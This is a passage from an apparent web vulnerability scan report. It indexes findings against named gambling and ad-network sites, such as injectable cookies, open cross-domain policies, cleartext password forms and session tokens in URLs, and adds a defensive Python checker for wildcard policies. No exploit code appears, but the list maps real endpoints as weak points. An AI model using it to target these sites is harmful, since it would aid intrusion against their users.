3.310. http://www.mundirasca.com/PlayersClub.aspx [RegistrationMode cookie]

3.311. http://www.mundirasca.com/Promotions.aspx [BO cookie]

3.312. http://www.mundirasca.com/Promotions.aspx [RegistrationMode cookie]

3.313. http://www.mundirasca.com/Responsible.aspx [BO cookie]

3.314. http://www.mundirasca.com/Responsible.aspx [RegistrationMode cookie]

3.315. http://www.mundirasca.com/SecurityAndPrivacy.aspx [BO cookie]

3.316. http://www.mundirasca.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.317. http://www.mundirasca.com/Terms.aspx [BO cookie]

3.318. http://www.mundirasca.com/Terms.aspx [RegistrationMode cookie]

3.319. http://www.mundirasca.com/UnderAge.aspx [BO cookie]

3.320. http://www.mundirasca.com/UnderAge.aspx [RegistrationMode cookie]

3.321. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [BO cookie]

3.322. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [RegistrationMode cookie]

3.323. https://www.neogamespartners.com/ [CMI parameter]

3.324. https://www.neogamespartners.com/ [CMI parameter]

3.325. https://www.neogamespartners.com/ [CMI parameter]

3.326. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]

3.327. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]

3.328. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]

3.329. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]

3.330. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]

3.331. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]

3.332. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]

3.333. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]

3.334. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]

3.335. http://www.primescratchcards.com/Responsible.asp [ARC cookie]

3.336. http://www.primescratchcards.com/Responsible.asp [ARC cookie]

3.337. http://www.primescratchcards.com/Responsible.asp [ARC cookie]

3.338. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]

3.339. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]

3.340. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]

3.341. http://www.primescratchcards.com/aboutus.asp [ARC cookie]

3.342. http://www.primescratchcards.com/aboutus.asp [ARC cookie]

3.343. http://www.primescratchcards.com/aboutus.asp [ARC cookie]

3.344. http://www.primescratchcards.com/affiliates.asp [ARC cookie]

3.345. http://www.primescratchcards.com/affiliates.asp [ARC cookie]

3.346. http://www.primescratchcards.com/affiliates.asp [ARC cookie]

3.347. http://www.primescratchcards.com/contactus.asp [ARC cookie]

3.348. http://www.primescratchcards.com/contactus.asp [ARC cookie]

3.349. http://www.primescratchcards.com/contactus.asp [ARC cookie]

3.350. http://www.primescratchcards.com/fairplay.asp [ARC cookie]

3.351. http://www.primescratchcards.com/fairplay.asp [ARC cookie]

3.352. http://www.primescratchcards.com/fairplay.asp [ARC cookie]

3.353. http://www.primescratchcards.com/help.asp [ARC cookie]

3.354. http://www.primescratchcards.com/help.asp [ARC cookie]

3.355. http://www.primescratchcards.com/help.asp [ARC cookie]

3.356. http://www.primescratchcards.com/index.asp [ARC cookie]

3.357. http://www.primescratchcards.com/index.asp [ARC cookie]

3.358. http://www.primescratchcards.com/index.asp [ARC cookie]

3.359. http://www.primescratchcards.com/media.asp [ARC cookie]

3.360. http://www.primescratchcards.com/media.asp [ARC cookie]

3.361. http://www.primescratchcards.com/media.asp [ARC cookie]

3.362. http://www.primescratchcards.com/playersclub.asp [ARC cookie]

3.363. http://www.primescratchcards.com/playersclub.asp [ARC cookie]

3.364. http://www.primescratchcards.com/playersclub.asp [ARC cookie]

3.365. http://www.primescratchcards.com/promotions.asp [ARC cookie]

3.366. http://www.primescratchcards.com/promotions.asp [ARC cookie]

3.367. http://www.primescratchcards.com/promotions.asp [ARC cookie]

3.368. http://www.primescratchcards.com/terms.asp [ARC cookie]

3.369. http://www.primescratchcards.com/terms.asp [ARC cookie]

3.370. http://www.primescratchcards.com/terms.asp [ARC cookie]

3.371. http://www.primescratchcards.com/underage.asp [ARC cookie]

3.372. http://www.primescratchcards.com/underage.asp [ARC cookie]

3.373. http://www.primescratchcards.com/underage.asp [ARC cookie]

3.374. http://www.scratch2cash.com/ [BO cookie]

3.375. http://www.scratch2cash.com/ [RegistrationMode cookie]

3.376. http://www.scratch2cash.com/AboutUs.aspx [BO cookie]

3.377. http://www.scratch2cash.com/AboutUs.aspx [RegistrationMode cookie]

3.378. http://www.scratch2cash.com/ContactUsMail.aspx [BO cookie]

3.379. http://www.scratch2cash.com/ContactUsMail.aspx [RegistrationMode cookie]

3.380. http://www.scratch2cash.com/FairPlay.aspx [BO cookie]

3.381. http://www.scratch2cash.com/FairPlay.aspx [RegistrationMode cookie]

3.382. http://www.scratch2cash.com/Help.aspx [BO cookie]

3.383. http://www.scratch2cash.com/Help.aspx [RegistrationMode cookie]

3.384. http://www.scratch2cash.com/Home.aspx [BO cookie]

3.385. http://www.scratch2cash.com/Home.aspx [RegistrationMode cookie]

3.386. http://www.scratch2cash.com/InviteFriend.aspx [BO cookie]

3.387. http://www.scratch2cash.com/InviteFriend.aspx [RegistrationMode cookie]

3.388. http://www.scratch2cash.com/PlayersClub.aspx [BO cookie]

3.389. http://www.scratch2cash.com/PlayersClub.aspx [RegistrationMode cookie]

3.390. http://www.scratch2cash.com/Promotions.aspx [BO cookie]

3.391. http://www.scratch2cash.com/Promotions.aspx [RegistrationMode cookie]

3.392. http://www.scratch2cash.com/Responsible.aspx [BO cookie]

3.393. http://www.scratch2cash.com/Responsible.aspx [RegistrationMode cookie]

3.394. http://www.scratch2cash.com/SecurityAndPrivacy.aspx [BO cookie]

3.395. http://www.scratch2cash.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.396. http://www.scratch2cash.com/Sitemap.aspx [BO cookie]

3.397. http://www.scratch2cash.com/Sitemap.aspx [RegistrationMode cookie]

3.398. http://www.scratch2cash.com/Terms.aspx [BO cookie]

3.399. http://www.scratch2cash.com/Terms.aspx [RegistrationMode cookie]

3.400. http://www.scratch2cash.com/UnderAge.aspx [BO cookie]

3.401. http://www.scratch2cash.com/UnderAge.aspx [RegistrationMode cookie]

3.402. http://www.scratchcardheaven.com/AboutUs.aspx [BO cookie]

3.403. http://www.scratchcardheaven.com/AboutUs.aspx [RegistrationMode cookie]

3.404. http://www.scratchcardheaven.com/ContactUsMail.aspx [BO cookie]

3.405. http://www.scratchcardheaven.com/ContactUsMail.aspx [RegistrationMode cookie]

3.406. http://www.scratchcardheaven.com/FairPlay.aspx [BO cookie]

3.407. http://www.scratchcardheaven.com/FairPlay.aspx [RegistrationMode cookie]

3.408. http://www.scratchcardheaven.com/Help.aspx [BO cookie]

3.409. http://www.scratchcardheaven.com/Help.aspx [RegistrationMode cookie]

3.410. http://www.scratchcardheaven.com/Home.aspx [BO cookie]

3.411. http://www.scratchcardheaven.com/Home.aspx [RegistrationMode cookie]

3.412. http://www.scratchcardheaven.com/InviteFriend.aspx [BO cookie]

3.413. http://www.scratchcardheaven.com/InviteFriend.aspx [RegistrationMode cookie]

3.414. http://www.scratchcardheaven.com/PlayersClub.aspx [BO cookie]

3.415. http://www.scratchcardheaven.com/PlayersClub.aspx [RegistrationMode cookie]

3.416. http://www.scratchcardheaven.com/Promotions.aspx [BO cookie]

3.417. http://www.scratchcardheaven.com/Promotions.aspx [RegistrationMode cookie]

3.418. http://www.scratchcardheaven.com/Responsible.aspx [BO cookie]

3.419. http://www.scratchcardheaven.com/Responsible.aspx [RegistrationMode cookie]

3.420. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx [BO cookie]

3.421. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.422. http://www.scratchcardheaven.com/Terms.aspx [BO cookie]

3.423. http://www.scratchcardheaven.com/Terms.aspx [RegistrationMode cookie]

3.424. http://www.scratchcardheaven.com/UnderAge.aspx [BO cookie]

3.425. http://www.scratchcardheaven.com/UnderAge.aspx [RegistrationMode cookie]

3.426. http://www.svenskalotter.com/ [BO cookie]

3.427. http://www.svenskalotter.com/ [RegistrationMode cookie]

3.428. http://www.svenskalotter.com/AboutUs.aspx [BO cookie]

3.429. http://www.svenskalotter.com/AboutUs.aspx [RegistrationMode cookie]

3.430. http://www.svenskalotter.com/Affiliates.aspx [BO cookie]

3.431. http://www.svenskalotter.com/Affiliates.aspx [RegistrationMode cookie]

3.432. http://www.svenskalotter.com/Charity.aspx [BO cookie]

3.433. http://www.svenskalotter.com/Charity.aspx [RegistrationMode cookie]

3.434. http://www.svenskalotter.com/ContactUsMail.aspx [BO cookie]

3.435. http://www.svenskalotter.com/ContactUsMail.aspx [RegistrationMode cookie]

3.436. http://www.svenskalotter.com/FairPlay.aspx [BO cookie]

3.437. http://www.svenskalotter.com/FairPlay.aspx [RegistrationMode cookie]

3.438. http://www.svenskalotter.com/Help.aspx [BO cookie]

3.439. http://www.svenskalotter.com/Help.aspx [RegistrationMode cookie]

3.440. http://www.svenskalotter.com/InviteFriend.aspx [BO cookie]

3.441. http://www.svenskalotter.com/InviteFriend.aspx [RegistrationMode cookie]

3.442. http://www.svenskalotter.com/PlayersClub.aspx [BO cookie]

3.443. http://www.svenskalotter.com/PlayersClub.aspx [RegistrationMode cookie]

3.444. http://www.svenskalotter.com/Promotions.aspx [BO cookie]

3.445. http://www.svenskalotter.com/Promotions.aspx [RegistrationMode cookie]

3.446. http://www.svenskalotter.com/Responsible.aspx [BO cookie]

3.447. http://www.svenskalotter.com/Responsible.aspx [RegistrationMode cookie]

3.448. http://www.svenskalotter.com/SecurityAndPrivacy.aspx [BO cookie]

3.449. http://www.svenskalotter.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.450. http://www.svenskalotter.com/Terms.aspx [BO cookie]

3.451. http://www.svenskalotter.com/Terms.aspx [RegistrationMode cookie]

3.452. http://www.svenskalotter.com/UnderAge.aspx [BO cookie]

3.453. http://www.svenskalotter.com/UnderAge.aspx [RegistrationMode cookie]

3.454. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ [BO cookie]

3.455. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ [RegistrationMode cookie]

3.456. http://www.winnings.com/how-to-win-money [winnings[sessionId] cookie]

3.457. http://www.winnings.com/how-to-win-money [winnings[vid] cookie]

3.458. http://www.winnings.com/instant-games [winnings[sessionId] cookie]

3.459. http://www.winnings.com/instant-games [winnings[sessionId] cookie]

3.460. http://www.winnings.com/instant-games [winnings[vid] cookie]

3.461. http://www.winnings.com/lottery-scratch-cards [winnings[sessionId] cookie]

3.462. http://www.winnings.com/lottery-scratch-cards [winnings[vid] cookie]

3.463. http://www.winnings.com/scratch-cards [winnings[sessionId] cookie]

3.464. http://www.winnings.com/scratch-cards [winnings[sessionId] cookie]

3.465. http://www.winnings.com/scratch-cards [winnings[vid] cookie]

3.466. http://www.winnings.com/site-map [winnings[vid] cookie]

3.467. http://www.winnings.com/slots [winnings[sessionId] cookie]

3.468. http://www.winnings.com/slots [winnings[sessionId] cookie]

3.469. http://www.winnings.com/slots [winnings[vid] cookie]

4. Flash cross-domain policy

4.1. http://ad-emea.doubleclick.net/crossdomain.xml

4.2. http://ad.doubleclick.net/crossdomain.xml

4.3. http://b.scorecardresearch.com/crossdomain.xml

4.4. http://bingo.bet365.com/crossdomain.xml

4.5. https://bingo.betsson.com/crossdomain.xml

4.6. http://c.betrad.com/crossdomain.xml

4.7. http://casino.bet365.com/crossdomain.xml

4.8. http://d.tradex.openx.com/crossdomain.xml

4.9. http://d.xp1.ru4.com/crossdomain.xml

4.10. http://games.bet365.com/crossdomain.xml

4.11. http://getclicky.com/crossdomain.xml

4.12. http://in.getclicky.com/crossdomain.xml

4.13. https://in.getclicky.com/crossdomain.xml

4.14. http://l.betrad.com/crossdomain.xml

4.15. http://log30.doubleverify.com/crossdomain.xml

4.16. http://m.xp1.ru4.com/crossdomain.xml

4.17. http://neogames-tech.com/crossdomain.xml

4.18. http://pixel.invitemedia.com/crossdomain.xml

4.19. http://pixel.quantserve.com/crossdomain.xml

4.20. http://platform.ak.fbcdn.net/crossdomain.xml

4.21. http://poker.bet365.com/crossdomain.xml

4.22. http://res.mccont.com/crossdomain.xml

4.23. http://s.mcstatic.com/crossdomain.xml

4.24. http://s0.2mdn.net/crossdomain.xml

4.25. http://s1.mcstatic.com/crossdomain.xml

4.26. http://s3.mcstatic.com/crossdomain.xml

4.27. http://s4.mcstatic.com/crossdomain.xml

4.28. http://s6.mcstatic.com/crossdomain.xml

4.29. http://secure-us.imrworldwide.com/crossdomain.xml

4.30. http://spe.atdmt.com/crossdomain.xml

4.31. http://static.getclicky.com/crossdomain.xml

4.32. https://static.getclicky.com/crossdomain.xml

4.33. http://va.px.invitemedia.com/crossdomain.xml

4.34. http://winter.metacafe.com/crossdomain.xml

4.35. https://www.betsson.com/crossdomain.xml

4.36. http://www.huddletogether.com/crossdomain.xml

4.37. http://www.metacafe.com/crossdomain.xml

4.38. http://www.neogames.com/crossdomain.xml

4.39. http://bigmoneyscratch.com/crossdomain.xml

4.40. http://br.bigmoneyscratch.com/crossdomain.xml

4.41. http://br.karamba.com/crossdomain.xml

4.42. http://da.bigmoneyscratch.com/crossdomain.xml

4.43. http://da.crazyscratch.com/crossdomain.xml

4.44. http://da.karamba.com/crossdomain.xml

4.45. http://da.scratch2cash.com/crossdomain.xml

4.46. http://da.scratchcardheaven.com/crossdomain.xml

4.47. http://de.bigmoneyscratch.com/crossdomain.xml

4.48. http://de.crazyscratch.com/crossdomain.xml

4.49. http://de.karamba.com/crossdomain.xml

4.50. http://de.scratch2cash.com/crossdomain.xml

4.51. http://de.scratchcardheaven.com/crossdomain.xml

4.52. http://download.neogames-tech.com/crossdomain.xml

4.53. https://download.neogames-tech.com/crossdomain.xml

4.54. http://el.crazyscratch.com/crossdomain.xml

4.55. http://el.karamba.com/crossdomain.xml

4.56. http://en.bigmoneyscratch.com/crossdomain.xml

4.57. http://en.crazyscratch.com/crossdomain.xml

4.58. http://en.info.winnings.com/crossdomain.xml

4.59. http://en.karamba.com/crossdomain.xml

4.60. http://en.scratch2cash.com/crossdomain.xml

4.61. http://en.scratchcardheaven.com/crossdomain.xml

4.62. http://es.bigmoneyscratch.com/crossdomain.xml

4.63. http://es.crazyscratch.com/crossdomain.xml

4.64. http://es.karamba.com/crossdomain.xml

4.65. http://es.scratch2cash.com/crossdomain.xml

4.66. http://es.scratchcardheaven.com/crossdomain.xml

4.67. http://feeds.bbci.co.uk/crossdomain.xml

4.68. http://fi.bigmoneyscratch.com/crossdomain.xml

4.69. http://fi.crazyscratch.com/crossdomain.xml

4.70. http://fi.karamba.com/crossdomain.xml

4.71. http://fi.scratchcardheaven.com/crossdomain.xml

4.72. http://fr.bigmoneyscratch.com/crossdomain.xml

4.73. http://fr.crazyscratch.com/crossdomain.xml

4.74. http://fr.karamba.com/crossdomain.xml

4.75. http://fr.scratch2cash.com/crossdomain.xml

4.76. http://fr.scratchcardheaven.com/crossdomain.xml

4.77. http://home.okscratchcards.com/crossdomain.xml

4.78. http://hu.crazyscratch.com/crossdomain.xml

4.79. http://it.bigmoneyscratch.com/crossdomain.xml

4.80. http://it.crazyscratch.com/crossdomain.xml

4.81. http://it.karamba.com/crossdomain.xml

4.82. http://it.scratch2cash.com/crossdomain.xml

4.83. http://it.scratchcardheaven.com/crossdomain.xml

4.84. http://itunes.apple.com/crossdomain.xml

4.85. http://karamba.com/crossdomain.xml

4.86. http://mundirasca.com/crossdomain.xml

4.87. http://nettiarpa.com/crossdomain.xml

4.88. http://newsrss.bbc.co.uk/crossdomain.xml

4.89. http://nl.bigmoneyscratch.com/crossdomain.xml

4.90. http://nl.crazyscratch.com/crossdomain.xml

4.91. http://nl.karamba.com/crossdomain.xml

4.92. http://nl.scratch2cash.com/crossdomain.xml

4.93. http://nl.scratchcardheaven.com/crossdomain.xml

4.94. http://no.bigmoneyscratch.com/crossdomain.xml

4.95. http://no.crazyscratch.com/crossdomain.xml

4.96. http://no.karamba.com/crossdomain.xml

4.97. http://no.scratchcardheaven.com/crossdomain.xml

4.98. http://optimized-by.rubiconproject.com/crossdomain.xml

4.99. http://pagead2.googlesyndication.com/crossdomain.xml

4.100. http://primescratchcards.com/crossdomain.xml

4.101. http://pt.bigmoneyscratch.com/crossdomain.xml

4.102. http://pt.crazyscratch.com/crossdomain.xml

4.103. http://pt.karamba.com/crossdomain.xml

4.104. http://pt.scratch2cash.com/crossdomain.xml

4.105. http://pt.scratchcardheaven.com/crossdomain.xml

4.106. http://pubads.g.doubleclick.net/crossdomain.xml

4.107. https://secure.neogames-tech.com/crossdomain.xml

4.108. http://server.iad.liveperson.net/crossdomain.xml

4.109. http://static.ak.fbcdn.net/crossdomain.xml

4.110. http://sv.bigmoneyscratch.com/crossdomain.xml

4.111. http://sv.crazyscratch.com/crossdomain.xml

4.112. http://sv.karamba.com/crossdomain.xml

4.113. http://sv.scratch2cash.com/crossdomain.xml

4.114. http://sv.scratchcardheaven.com/crossdomain.xml

4.115. http://svenskalotter.com/crossdomain.xml

4.116. http://video.google.com/crossdomain.xml

4.117. http://www.adobe.com/crossdomain.xml

4.118. http://www.apple.com/crossdomain.xml

4.119. http://www.bigmoneyscratch.com/crossdomain.xml

4.120. http://www.crazyscratch.com/crossdomain.xml

4.121. http://www.facebook.com/crossdomain.xml

4.122. http://www.hopa.com/crossdomain.xml

4.123. http://www.info.crazyscratch.com/crossdomain.xml

4.124. http://www.info.winnings.com/crossdomain.xml

4.125. http://www.karamba.com/crossdomain.xml

4.126. http://www.maestrocard.com/crossdomain.xml

4.127. http://www.mundirasca.com/crossdomain.xml

4.128. http://www.pclscratch.com/crossdomain.xml

4.129. http://www.primegrattage.com/crossdomain.xml

4.130. http://www.primescratchcards.com/crossdomain.xml

4.131. http://www.scratch2cash.com/crossdomain.xml

4.132. http://www.scratchcardheaven.com/crossdomain.xml

4.133. http://www.svenskalotter.com/crossdomain.xml

4.134. http://www.youtube.com/crossdomain.xml

4.135. http://api.twitter.com/crossdomain.xml

4.136. https://casino.betsson.com/crossdomain.xml

4.137. https://games.betsson.com/crossdomain.xml

4.138. https://livecasino.betsson.com/crossdomain.xml

4.139. http://members.bet365.com/crossdomain.xml

4.140. https://members.bet365.com/crossdomain.xml

4.141. https://poker.betsson.com/crossdomain.xml

4.142. https://scratch.betsson.com/crossdomain.xml

4.143. http://twitter.com/crossdomain.xml

4.144. https://www.norskelodd.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

5.2. http://ad.doubleclick.net/clientaccesspolicy.xml

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.4. http://s0.2mdn.net/clientaccesspolicy.xml

5.5. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.6. http://spe.atdmt.com/clientaccesspolicy.xml
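
Sections 4 and 5 list every crossdomain.xml and clientaccesspolicy.xml the scanner retrieved, but the index alone does not say which of them are actually open. The check that matters is whether a policy grants access to any origin ("*"), whether it drops the HTTPS-only requirement (secure="false"), and whether it lets arbitrary request headers through. The following Python is an added example, not part of the XSS.CX report and not taken from any of the hosts above: it parses a policy document handed to it as a string and returns the over-permissive patterns it finds. The three policy documents embedded in it are constructed for the demonstration; to check a real host you would fetch /crossdomain.xml or /clientaccesspolicy.xml yourself and pass the body in.

```python
"""Flag open Flash (crossdomain.xml) and Silverlight (clientaccesspolicy.xml) policies.

Added example. The policy documents at the bottom are constructed samples, not
copies of any host's real policy.
"""
import xml.etree.ElementTree as ET


def _audit_flash(root: ET.Element) -> list[str]:
    """Findings for a <cross-domain-policy> document (Flash / Adobe AIR)."""
    findings = []
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "").strip()
        if domain == "*":
            findings.append('allow-access-from domain="*": any SWF on the web may read '
                            "this host's responses with the victim's cookies attached")
        # secure defaults to true on an https host; "false" lets an http:// SWF call it.
        if el.get("secure", "true").strip().lower() == "false":
            findings.append(f'allow-access-from domain="{domain}" secure="false": SWFs loaded '
                            "over http:// may reach this host over https://")
    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain", "").strip() == "*" and el.get("headers", "").strip() == "*":
            findings.append('allow-http-request-headers-from domain="*" headers="*": any '
                            "origin may send arbitrary request headers")
    return findings


def _audit_silverlight(root: ET.Element) -> list[str]:
    """Findings for an <access-policy> document (Silverlight)."""
    findings = []
    for policy in root.iter("policy"):
        allow = policy.find("allow-from")
        grant = policy.find("grant-to")
        if allow is None or grant is None:
            continue
        any_origin = any(d.get("uri", "").strip() == "*" for d in allow.iter("domain"))
        whole_site = any(
            r.get("path", "").strip() == "/"
            and r.get("include-subpaths", "false").strip().lower() == "true"
            for r in grant.iter("resource")
        )
        if any_origin and whole_site:
            findings.append('domain uri="*" granted resource path="/" include-subpaths="true": '
                            "any origin may reach every URL on this host")
        if any_origin and allow.get("http-request-headers", "").strip() == "*":
            findings.append('allow-from http-request-headers="*" with uri="*": any origin '
                            "may send arbitrary request headers")
    return findings


def audit_policy(xml_text: str) -> list[str]:
    """Return human-readable findings for one policy document.

    An empty list means none of the open-to-any-origin patterns checked here is
    present; it is not a statement that the policy is safe in every respect.
    """
    root = ET.fromstring(xml_text)
    if root.tag == "cross-domain-policy":
        return _audit_flash(root)
    if root.tag == "access-policy":
        return _audit_silverlight(root)
    return [f"unrecognised policy root element <{root.tag}>"]


# Constructed sample policies (not fetched from any real host).
OPEN_FLASH_POLICY = """<cross-domain-policy>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

SCOPED_FLASH_POLICY = """<cross-domain-policy>
  <allow-access-from domain="*.example.com"/>
  <allow-access-from domain="cdn.example.net" secure="true"/>
</cross-domain-policy>"""

OPEN_SILVERLIGHT_POLICY = """<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""

if __name__ == "__main__":
    for label, doc in [("open flash", OPEN_FLASH_POLICY),
                       ("scoped flash", SCOPED_FLASH_POLICY),
                       ("open silverlight", OPEN_SILVERLIGHT_POLICY)]:
        print(label, "->", audit_policy(doc) or ["no open-policy pattern found"])
```

A wildcard policy on a host that serves no authenticated content (an ad pixel, a static CDN) is usually deliberate and harmless; the same policy on a host that sets session cookies lets a hostile SWF or Silverlight application on any site read the victim's pages cross-origin, which is why the report lists the policy URL rather than calling every entry a vulnerability.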

6. Cleartext submission of password

6.1. http://affiliates.interwetten.com/

6.2. http://bingo.bet365.com/play/en/home/

6.3. http://casino.bet365.com/extra/en/online-games/baccarat

6.4. http://casino.bet365.com/extra/en/online-games/blackjack

6.5. http://casino.bet365.com/extra/en/online-games/live-dealer

6.6. http://casino.bet365.com/extra/en/online-games/roulette

6.7. http://casino.bet365.com/home/en/

6.8. http://games.bet365.com/home/en/

6.9. http://poker.bet365.com/home/en/

6.10. http://www.bet365.com/extra/en/betting/in-play

6.11. http://www.bet365.com/extra/en/betting/live-streaming

6.12. http://www.bet365.com/extra/en/mobile/introduction/

6.13. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed

6.14. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back

6.15. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus

6.16. http://www.crazyrewards.com/

6.17. http://www.facebook.com/

6.18. http://www.heavenaffiliates.com/

6.19. http://www.postcodelottery.com/MyAccount.htm

6.20. http://www.tstglobal.com/

7. SSL cookie without secure flag set

7.1. https://bingo.betsson.com/en/

7.2. https://help.betsson.com/display/4/kb/faq/index.aspx

7.3. https://members.bet365.com/members/chat/

7.4. https://poker.betsson.com/en/

7.5. https://scratch.betsson.com/en/

7.6. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx

7.7. https://www.betsson.com/en/about/

7.8. https://www.betsson.com/en/about/company-information/payments-and-security/index.asp

7.9. https://www.betsson.com/en/customer-service/

7.10. https://www.betsson.com/en/customer-service/forgotten-password/

7.11. https://www.betsson.com/en/customer-service/privacy-statement/

7.12. https://www.betsson.com/en/customer-service/responsible-gaming/

7.13. https://www.betsson.com/en/customer-service/terms/index.asp

7.14. https://www.betsson.com/en/my-account/refer-a-friend/index.asp

7.15. https://www.betsson.com/my-account/refer-a-friend/index.asp

7.16. https://www.betsson.com/web/en/sportsbook/

7.17. https://www.interwetten.com/en/Default.aspx

7.18. https://www.betsson.com/core/StartPlaying/Api/StartPlayingInit.ashx

7.19. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

7.20. https://www.betsson.com/start/en/

7.21. https://www.betsson.com/start/is/

7.22. https://www.interwetten.com/

7.23. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

7.24. https://www.thawte.com/

8. Session token in URL

8.1. http://www.facebook.com/extern/login_status.php

8.2. http://www.heavenaffiliates.com/

8.3. http://www.metacafe.com/fplayer/

8.4. http://www.youtube.com/user/CrazyScratchCom

8.5. http://www.youtube.com/user/PostcodeLottery

8.6. http://www.youtube.com/user/primescratchcards1

9. SSL certificate

9.1. https://clicktale.pantherssl.com/

9.2. https://www.aspireaffiliates.com/

9.3. https://www.thawte.com/

9.4. https://help.betsson.com/

9.5. https://bingo.betsson.com/

9.6. https://ble.hs.llnwd.net/

9.7. https://casino.betsson.com/

9.8. https://download.macromedia.com/

9.9. https://download.neogames-tech.com/

9.10. https://games.betsson.com/

9.11. https://in.getclicky.com/

9.12. https://livecasino.betsson.com/

9.13. https://members.bet365.com/

9.14. https://poker.betsson.com/

9.15. https://scratch.betsson.com/

9.16. https://seal.verisign.com/

9.17. https://sealinfo.verisign.com/

9.18. https://secure.neogames-tech.com/

9.19. https://static.getclicky.com/

9.20. https://www.betsson.com/

9.21. https://www.interwetten.com/

9.22. https://www.macromedia.com/

9.23. https://www.neogamespartners.com/

9.24. https://www.norskelodd.com/

9.25. https://www.postcodelottery.com/

10. ASP.NET ViewState without MAC enabled

10.1. http://www.lga.org.mt/lga/content.aspx

10.2. http://www.lga.org.mt/lga/home.aspx

11. Cookie scoped to parent domain

11.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

11.2. http://br.winnings.com/

11.3. http://da.winnings.com/

11.4. http://de.winnings.com/

11.5. http://el.winnings.com/

11.6. http://es.winnings.com/

11.7. http://fi.winnings.com/

11.8. http://fr.winnings.com/

11.9. http://nl.winnings.com/

11.10. http://no.winnings.com/

11.11. http://pt.winnings.com/

11.12. http://sv.winnings.com/

11.13. http://www.metacafe.com/fplayer/

11.14. http://www.opensource.org/licenses/mit-license.php

11.15. http://www.vincite.net/

11.16. http://www.winnings.com/

11.17. http://www.winnings.com/xmlrpc.php

11.18. http://b.scorecardresearch.com/b

11.19. http://bid.openx.net/json

11.20. http://br.bigmoneyscratch.com/Home.aspx

11.21. http://br.karamba.com/Home.aspx

11.22. http://da.bigmoneyscratch.com/Home.aspx

11.23. http://da.karamba.com/Home.aspx

11.24. http://da.scratch2cash.com/Home.aspx

11.25. http://da.scratchcardheaven.com/Home.aspx

11.26. http://de.bigmoneyscratch.com/Home.aspx

11.27. http://de.karamba.com/Home.aspx

11.28. http://de.scratch2cash.com/Home.aspx

11.29. http://de.scratchcardheaven.com/Home.aspx

11.30. http://el.karamba.com/Home.aspx

11.31. http://es.bigmoneyscratch.com/Home.aspx

11.32. http://es.karamba.com/Home.aspx

11.33. http://es.scratch2cash.com/Home.aspx

11.34. http://es.scratchcardheaven.com/Home.aspx

11.35. http://fi.bigmoneyscratch.com/Home.aspx

11.36. http://fi.karamba.com/Home.aspx

11.37. http://fi.scratchcardheaven.com/Home.aspx

11.38. http://fr.bigmoneyscratch.com/Home.aspx

11.39. http://fr.karamba.com/Home.aspx

11.40. http://fr.scratch2cash.com/Home.aspx

11.41. http://fr.scratchcardheaven.com/Home.aspx

11.42. http://home.okscratchcards.com/AboutUs.aspx

11.43. http://home.okscratchcards.com/ContactUsMail.aspx

11.44. http://home.okscratchcards.com/FairPlay.aspx

11.45. http://home.okscratchcards.com/PlayersClub.aspx

11.46. http://home.okscratchcards.com/Promotions.aspx

11.47. http://home.okscratchcards.com/Responsible.aspx

11.48. http://home.okscratchcards.com/SecurityAndPrivacy.aspx

11.49. http://home.okscratchcards.com/Terms.aspx

11.50. http://home.okscratchcards.com/help.aspx

11.51. http://home.okscratchcards.com/visit.aspx

11.52. http://it.bigmoneyscratch.com/Home.aspx

11.53. http://it.karamba.com/Home.aspx

11.54. http://it.scratch2cash.com/Home.aspx

11.55. http://it.scratchcardheaven.com/Home.aspx

11.56. http://m.xp1.ru4.com/ad

11.57. http://nl.bigmoneyscratch.com/Home.aspx

11.58. http://nl.karamba.com/Home.aspx

11.59. http://nl.scratch2cash.com/Home.aspx

11.60. http://nl.scratchcardheaven.com/Home.aspx

11.61. http://no.bigmoneyscratch.com/Home.aspx

11.62. http://no.karamba.com/Home.aspx

11.63. http://no.scratchcardheaven.com/Home.aspx

11.64. http://pixel.invitemedia.com/data_sync

11.65. http://pixel.quantserve.com/pixel

11.66. http://pixel.quantserve.com/pixel/p-96ifrWFBpTdiA.gif

11.67. http://pt.bigmoneyscratch.com/Home.aspx

11.68. http://pt.karamba.com/Home.aspx

11.69. http://pt.scratch2cash.com/Home.aspx

11.70. http://pt.scratchcardheaven.com/Home.aspx

11.71. http://server.iad.liveperson.net/hc/15712222/

11.72. http://solutions.liveperson.com/ref/lppb.asp

